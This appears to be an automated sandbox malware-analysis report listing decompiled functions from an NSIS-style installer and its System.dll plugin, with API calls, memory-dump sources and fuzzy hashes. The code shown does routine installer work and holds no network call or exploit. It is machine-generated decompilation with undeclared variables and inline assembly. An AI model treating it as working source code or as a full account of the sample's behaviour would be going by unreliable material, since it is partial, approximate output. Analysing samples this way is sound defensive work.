                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                                                                                                                            0x00401d81
                                                                                                                                                                                                                            0x00401d85
                                                                                                                                                                                                                            0x00401d9a
                                                                                                                                                                                                                            0x00401d87
                                                                                                                                                                                                                            0x00401d89
                                                                                                                                                                                                                            0x00401d8f
                                                                                                                                                                                                                            0x00401d8f
                                                                                                                                                                                                                            0x00401da0
                                                                                                                                                                                                                            0x00401da3
                                                                                                                                                                                                                            0x00401dad
                                                                                                                                                                                                                            0x00401db0
                                                                                                                                                                                                                            0x00401db8
                                                                                                                                                                                                                            0x00401dc9
                                                                                                                                                                                                                            0x00401dcc
                                                                                                                                                                                                                            0x00401dd7
                                                                                                                                                                                                                            0x00401dce
                                                                                                                                                                                                                            0x00401dd0
                                                                                                                                                                                                                            0x00401dd0
                                                                                                                                                                                                                            0x00401ddb
                                                                                                                                                                                                                            0x00401de5
                                                                                                                                                                                                                            0x00401e0c
                                                                                                                                                                                                                            0x00401e1b
                                                                                                                                                                                                                            0x00401e29
                                                                                                                                                                                                                            0x00401e31
                                                                                                                                                                                                                            0x00401e39
                                                                                                                                                                                                                            0x00401e39
                                                                                                                                                                                                                            0x00401e42
                                                                                                                                                                                                                            0x00401e48
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                                                                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E687E16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                                                                                                                                                            0x687e16d7
                                                                                                                                                                                                                            0x687e16e3
                                                                                                                                                                                                                            0x687e16f0
                                                                                                                                                                                                                            0x687e16f7
                                                                                                                                                                                                                            0x687e1700
                                                                                                                                                                                                                            0x687e170c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16D5
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16DC
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16F0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(687E22D8,00000000), ref: 687E16F7
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1700
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1148316912-0
                                                                                                                                                                                                                            • Opcode ID: d5e2a8bef61d3699f892b1c72e422fbcea68f53e99e6bcadd6ef9a23c1bef27a
                                                                                                                                                                                                                            • Instruction ID: b4f3efabdec50f8cb1a741a2f88fc8e81d83d305a0a1bfe1ab25fa728b975e68
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5e2a8bef61d3699f892b1c72e422fbcea68f53e99e6bcadd6ef9a23c1bef27a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F01C722065387BDA3016A7CC4CC9BBEACDF8B2F5B110271F6289229096614C01E7F1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                                                                                                                            0x00405f38
                                                                                                                                                                                                                            0x00405f45
                                                                                                                                                                                                                            0x00405f46
                                                                                                                                                                                                                            0x00405f51
                                                                                                                                                                                                                            0x00405f59
                                                                                                                                                                                                                            0x00405f59
                                                                                                                                                                                                                            0x00405f61

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 2659869361-3916508600
                                                                                                                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E687E10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x687e506c = _a8;
				 *0x687e5070 = _a16;
				 *0x687e5074 = _a12;
				_a12( *0x687e5048, E687E1651, _t73);
				_t66 =  *0x687e506c +  *0x687e506c * 4 << 3;
				_t27 = E687E12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x687e5040;
							if( *0x687e5040 == 0) {
								goto L26;
							}
							E687E1603( *0x687e5074, _t31 + 4, _t66);
							_t34 =  *0x687e5040;
							_t86 = _t86 + 0xc;
							 *0x687e5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E687E1312(E687E135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E687E1381(_t80, E687E12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E687E1603(_t10,  *0x687e5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x687e5040;
							 *0x687e5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x687e5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E687E1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x687e506c +  *0x687e506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E687E1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x687e5070);
						 *( *0x687e5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                                                                                                                                                            0x687e10eb
                                                                                                                                                                                                                            0x687e1100
                                                                                                                                                                                                                            0x687e1109
                                                                                                                                                                                                                            0x687e110e
                                                                                                                                                                                                                            0x687e1119
                                                                                                                                                                                                                            0x687e111c
                                                                                                                                                                                                                            0x687e1125
                                                                                                                                                                                                                            0x687e1129
                                                                                                                                                                                                                            0x687e112b
                                                                                                                                                                                                                            0x687e12b0
                                                                                                                                                                                                                            0x687e12ba
                                                                                                                                                                                                                            0x687e12ba
                                                                                                                                                                                                                            0x687e1132
                                                                                                                                                                                                                            0x687e1132
                                                                                                                                                                                                                            0x687e1137
                                                                                                                                                                                                                            0x687e1138
                                                                                                                                                                                                                            0x687e113a
                                                                                                                                                                                                                            0x687e113d
                                                                                                                                                                                                                            0x687e1256
                                                                                                                                                                                                                            0x687e1259
                                                                                                                                                                                                                            0x687e1271
                                                                                                                                                                                                                            0x687e1271
                                                                                                                                                                                                                            0x687e1278
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1285
                                                                                                                                                                                                                            0x687e128a
                                                                                                                                                                                                                            0x687e128f
                                                                                                                                                                                                                            0x687e1294
                                                                                                                                                                                                                            0x687e129a
                                                                                                                                                                                                                            0x687e129b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e129b
                                                                                                                                                                                                                            0x687e125b
                                                                                                                                                                                                                            0x687e125e
                                                                                                                                                                                                                            0x687e11bc
                                                                                                                                                                                                                            0x687e11bf
                                                                                                                                                                                                                            0x687e11c2
                                                                                                                                                                                                                            0x687e11cb
                                                                                                                                                                                                                            0x687e11d0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e11d1
                                                                                                                                                                                                                            0x687e1264
                                                                                                                                                                                                                            0x687e1266
                                                                                                                                                                                                                            0x687e11a2
                                                                                                                                                                                                                            0x687e11a5
                                                                                                                                                                                                                            0x687e11a8
                                                                                                                                                                                                                            0x687e11b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e11b1
                                                                                                                                                                                                                            0x687e1164
                                                                                                                                                                                                                            0x687e1165
                                                                                                                                                                                                                            0x687e1177
                                                                                                                                                                                                                            0x687e1180
                                                                                                                                                                                                                            0x687e1184
                                                                                                                                                                                                                            0x687e118e
                                                                                                                                                                                                                            0x687e1191
                                                                                                                                                                                                                            0x687e1193
                                                                                                                                                                                                                            0x687e1193
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1165
                                                                                                                                                                                                                            0x687e1143
                                                                                                                                                                                                                            0x687e1218
                                                                                                                                                                                                                            0x687e121d
                                                                                                                                                                                                                            0x687e1221
                                                                                                                                                                                                                            0x687e1223
                                                                                                                                                                                                                            0x687e122c
                                                                                                                                                                                                                            0x687e122f
                                                                                                                                                                                                                            0x687e1238
                                                                                                                                                                                                                            0x687e123d
                                                                                                                                                                                                                            0x687e123d
                                                                                                                                                                                                                            0x687e1247
                                                                                                                                                                                                                            0x687e124a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1250
                                                                                                                                                                                                                            0x687e1149
                                                                                                                                                                                                                            0x687e114c
                                                                                                                                                                                                                            0x687e11e9
                                                                                                                                                                                                                            0x687e11ed
                                                                                                                                                                                                                            0x687e11f7
                                                                                                                                                                                                                            0x687e11fb
                                                                                                                                                                                                                            0x687e1205
                                                                                                                                                                                                                            0x687e120a
                                                                                                                                                                                                                            0x687e1211
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1211
                                                                                                                                                                                                                            0x687e1152
                                                                                                                                                                                                                            0x687e1155
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e115b
                                                                                                                                                                                                                            0x687e115e
                                                                                                                                                                                                                            0x687e11b8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e11b8
                                                                                                                                                                                                                            0x687e1160
                                                                                                                                                                                                                            0x687e1162
                                                                                                                                                                                                                            0x687e119e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e119e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e12a1
                                                                                                                                                                                                                            0x687e12a1
                                                                                                                                                                                                                            0x687e12ab
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                                                                            • Opcode ID: 76a610d022264217b7933a6fea25827acba1924e5c3d56c8f82e79cabca72662
                                                                                                                                                                                                                            • Instruction ID: 7e4f4ce89fc49bebf4d045d71a7dd24d2a261aa0ca2bb70690dcb062379b40e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a610d022264217b7933a6fea25827acba1924e5c3d56c8f82e79cabca72662
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE5170B5A00205DFDB10DF78DA4EA6977E8FB0A31AB804579F964DB250EB74D940CB70
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp", "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                                                                                                                            0x0040263e
                                                                                                                                                                                                                            0x0040263e
                                                                                                                                                                                                                            0x0040263e
                                                                                                                                                                                                                            0x00402643
                                                                                                                                                                                                                            0x00402646
                                                                                                                                                                                                                            0x00402649
                                                                                                                                                                                                                            0x0040264e
                                                                                                                                                                                                                            0x00402650
                                                                                                                                                                                                                            0x00402670
                                                                                                                                                                                                                            0x004026aa
                                                                                                                                                                                                                            0x00402672
                                                                                                                                                                                                                            0x00402674
                                                                                                                                                                                                                            0x00402688
                                                                                                                                                                                                                            0x00402695
                                                                                                                                                                                                                            0x00402695
                                                                                                                                                                                                                            0x00402652
                                                                                                                                                                                                                            0x00402654
                                                                                                                                                                                                                            0x00402659
                                                                                                                                                                                                                            0x00402667
                                                                                                                                                                                                                            0x0040266a
                                                                                                                                                                                                                            0x004026af
                                                                                                                                                                                                                            0x004026b2
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x004026b8
                                                                                                                                                                                                                            0x004026c1
                                                                                                                                                                                                                            0x004026c3
                                                                                                                                                                                                                            0x004026e2
                                                                                                                                                                                                                            0x004015b4
                                                                                                                                                                                                                            0x004015b6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004015bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004026c3
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
                                                                                                                                                                                                                            • API String ID: 1659193697-3506538004
                                                                                                                                                                                                                            • Opcode ID: 8c6554b53cfcec5e2f07c2cef93b4325bcb2464f26661cdf6029d648463e49ea
                                                                                                                                                                                                                            • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c6554b53cfcec5e2f07c2cef93b4325bcb2464f26661cdf6029d648463e49ea
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2a4
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2a0
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsbCCFB.tmp", 7);
			}






                                                                                                                                                                                                                            0x00403c25
                                                                                                                                                                                                                            0x00403c34
                                                                                                                                                                                                                            0x00403c37
                                                                                                                                                                                                                            0x00403c39
                                                                                                                                                                                                                            0x00403c39
                                                                                                                                                                                                                            0x00403c40
                                                                                                                                                                                                                            0x00403c48
                                                                                                                                                                                                                            0x00403c4b
                                                                                                                                                                                                                            0x00403c4d
                                                                                                                                                                                                                            0x00403c4d
                                                                                                                                                                                                                            0x00403c4d
                                                                                                                                                                                                                            0x00403c54
                                                                                                                                                                                                                            0x00403c66

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000002A4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
